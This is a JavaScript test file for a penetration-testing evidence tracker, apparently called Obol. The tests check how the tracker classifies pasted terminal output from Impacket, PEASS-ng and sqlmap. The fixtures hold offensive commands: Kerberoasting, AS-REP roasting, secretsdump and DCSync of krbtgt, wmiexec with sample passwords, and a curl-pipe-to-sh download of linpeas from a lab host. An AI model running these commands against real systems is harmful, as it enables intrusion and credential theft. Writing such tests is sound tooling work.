'use strict';
const assert=require('assert'),fs=require('fs'),vm=require('vm'),path=require('path');global.window=globalThis;global.DOMParser=function(){};
function run(file){vm.runInThisContext(fs.readFileSync(file,'utf8'),{filename:file});}const root=path.join(__dirname,'..');
for(const f of ['lanes.js','methodology-v2.2.js','methodology-v2.3.js','methodology-v2.5.js','tools-v2.2.js','methodology-v3.3.js','methodology-v3.4.js','methodology-v3.6.js'])run(path.join(root,'data',f));
for(const f of ['core-v2-base.js','core-v2.js','core-v2.1.js','core-v2.2.js','core-v2.3.js','core-v2.4.js','core-v2.5.js','core-v2.6.js','core-v2.7.js','core-v2.8.js','core-v2.9.js','core-v3.0.js','core-v3.1.js','core-v3.2.js','core-v3.3.js','core-v3.4.js','core-v3.5.js','core-v3.6.js','core-v3.7.js','core-v3.8.js','core-v3.9.js'])run(path.join(root,'assets',f));
for(const f of ['intake-v2.1.js','intake-v2.5.js','intake-v3.5.js','intake-v3.6.js','intake-v3.9.js'])run(path.join(root,'assets',f));
const C=global.OBOL_CORE_V2,T=global.OBOL_INTAKE_V21,I=global.OBOL_INTAKE_V39,lanes=global.OBOL_LANES;let passed=0;function test(n,f){try{f();console.log('ok - '+n);passed++;}catch(e){console.error('FAIL - '+n);throw e;}}
function hostState(){const s=C.newState();s.hosts.push({id:'h1',ip:'10.10.10.10',name:'LAB',hostname:'LAB',domain:'corp.local',os:'Windows',notes:'',ports:[],flags:[],creds:[]});s.activeContext={type:'host',id:'h1'};s.params.target='10.10.10.10';s.params.domain='corp.local';return s;}
function one(text){const s=hostState(),r=T.analyzeTerminal(text,lanes,s,s.activeContext);return{state:s,result:r};}

test('v3.9 initializes current release and Evidence coverage preferences',()=>{const s=C.newState();assert.strictEqual(C.VERSION,'3.9.0');assert.strictEqual(s.obolVersion,'3.9.0');assert.strictEqual(s.ui.evidence39.showCoverage,true);});
test('Impacket GetNPUsers maps to AS-REP roasting and only proves a hash from an explicit marker',()=>{const {result}=one("kali$ impacket-GetNPUsers corp.local/ -dc-ip 10.10.10.10 -usersfile users.txt -no-pass\n$krb5asrep$23$svc_backup@CORP.LOCAL:deadbeef");const a=result.activities.find(x=>x.cardId==='asrep-roast');assert(a);assert.strictEqual(a.result,'success');assert(a.outcomeFacts.includes('kerberos.asrep_hash'));});
test('Impacket GetUserSPNs maps to Kerberoast and preserves explicit TGS proof',()=>{const {result}=one("kali$ impacket-GetUserSPNs corp.local/user:Passw0rd! -dc-ip 10.10.10.10 -request\n$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql.corp.local:1433*$deadbeef");const a=result.activities.find(x=>x.cardId==='kerberoast');assert(a);assert.strictEqual(a.result,'success');assert(a.outcomeFacts.includes('kerberos.tgs_hash'));});
test('Impacket getTGT maps to ticket workflow and proves ticket state only from saved-ticket output',()=>{const {result}=one("kali$ impacket-getTGT corp.local/user:Passw0rd! -dc-ip 10.10.10.10\n[*] Saving ticket in user.ccache");const a=result.activities.find(x=>x.cardId==='kerberos-tickets');assert(a);assert.strictEqual(a.result,'success');assert(a.outcomeFacts.includes('kerberos.ticket'));});
test('secretsdump distinguishes local dumping from DCSync selectors',()=>{let x=one("kali$ impacket-secretsdump corp.local/admin:Passw0rd!@10.10.10.20\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::").result.activities.find(a=>a.cardId==='dump-secrets');assert(x&&x.outcomeFacts.includes('hash.ntlm'));x=one("kali$ impacket-secretsdump corp.local/admin:Passw0rd!@10.10.10.10 -just-dc-user krbtgt\nkrbtgt:502:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::").result.activities.find(a=>a.cardId==='dcsync');assert(x&&x.outcomeFacts.includes('hash.krbtgt'));});
test('Impacket remote execution is classified without inventing privilege from weak output',()=>{const {result}=one("kali$ impacket-wmiexec corp.local/user:Passw0rd!@10.10.10.20\nImpacket v0.12.0\n[*] SMBv3.0 dialect used");const a=result.activities.find(x=>x.cardId==='lateral-exec');assert(a);assert(!a.outcomeFacts.includes('access.system'));assert(!a.outcomeFacts.includes('foothold.windows'));});
test('PEASS-ng transcripts map to local enumeration without inventing root or SYSTEM',()=>{let x=one("user@host$ curl -L http://10.10.14.2:8000/linpeas.sh | sh\n╔══════════╣ Basic information\nuid=1000(user)").result.activities.find(a=>a.cardId==='linux-enum');assert(x);assert(!x.outcomeFacts.includes('access.root'));x=one("PS C:\\Temp> .\\winPEASx64.exe\n=== Windows Enumeration ===\nUser: lab\\student").result.activities.find(a=>a.cardId==='windows-enum');assert(x);assert(!x.outcomeFacts.includes('access.system'));});
test('SQLmap explicit injectable output can establish SQLi confirmation without implying shell or credentials',()=>{const {result}=one("kali$ sqlmap -r request.txt --batch\n[INFO] POST parameter 'id' appears to be injectable\nback-end DBMS: Microsoft SQL Server 2019");const a=result.activities.find(x=>x.cardId==='sqlmap-automation');assert(a);assert.strictEqual(a.result,'success');assert(a.outcomeFacts.includes('web.sqli_confirmed'));assert(!a.outcomeFacts.includes('foothold.webshell'));assert(!a.outcomeFacts.includes('db.creds'));});
test('mixed full-session transcript keeps PEAS, SQLmap, and Impacket activities separated',()=>{const text="user@linux$ ./linpeas.sh\n[+] Linux enumeration started\nkali$ sqlmap -r request.txt --batch\n[INFO] POST parameter 'id' appears to be injectable\nback-end DBMS: PostgreSQL\nkali$ impacket-GetUserSPNs corp.local/user:Passw0rd! -request\n$krb5tgs$23$*svc_web$CORP.LOCAL$HTTP/web.corp.local*$deadbeef";const {result}=one(text);assert(result.activities.some(x=>x.cardId==='linux-enum'));assert(result.activities.some(x=>x.cardId==='sqlmap-automation'&&x.outcomeFacts.includes('web.sqli_confirmed')));assert(result.activities.some(x=>x.cardId==='kerberoast'&&x.outcomeFacts.includes('kerberos.tgs_hash')));});
test('Evidence coverage summary reports recognized historical tool families by context',()=>{const s=hostState(),a=C.recordActivity(s,{cardId:'kerberoast',context:s.activeContext,result:'success',command:'impacket-GetUserSPNs corp.local/user:pw -request',evidence:'hash'}),b=C.recordActivity(s,{cardId:'linux-enum',context:s.activeContext,result:'tried',command:'./linpeas.sh',evidence:'enum'});assert(a&&b);const rows=C.evidenceCoverageSummary39(s,s.activeContext);assert(rows.some(x=>x.family==='impacket-kerberoast'&&x.success===1));assert(rows.some(x=>x.family==='peas-linux'&&x.tried===1));});
test('release wiring, README priorities, and CI include v3.9',()=>{const idx=fs.readFileSync(path.join(root,'index.html'),'utf8'),wf=fs.readFileSync(path.join(root,'.github','workflows','tests.yml'),'utf8'),readme=fs.readFileSync(path.join(root,'README.md'),'utf8'),notes=fs.readFileSync(path.join(root,'docs','v3.9.md'),'utf8');assert(idx.includes('Obol v3.9'));assert(idx.includes('core-v3.9.js'));assert(idx.includes('intake-v3.9.js'));assert(idx.includes('app-v3.9.js'));assert(idx.includes('obol-v3.9.css'));assert(wf.includes('Run v3.9 regression suite'));assert(readme.includes('## Obol v3.9'));assert(readme.includes('Orange Cyber Defense mind map'));assert(/Impacket/i.test(readme));assert(/full-session/i.test(notes));});
test('sanitized export retains v3.9 and inherited secret redaction',()=>{const s=C.newState();C.addTypedArtifact(s,'secrets','DoNotExport!',{});const safe=C.sanitizedCopy(s);assert.strictEqual(safe.obolVersion,'3.9.0');assert.strictEqual(safe.typedArtifacts.secrets[0].value,'[REDACTED SECRET]');});
console.log(`\n${passed} v3.9 tests passed`);
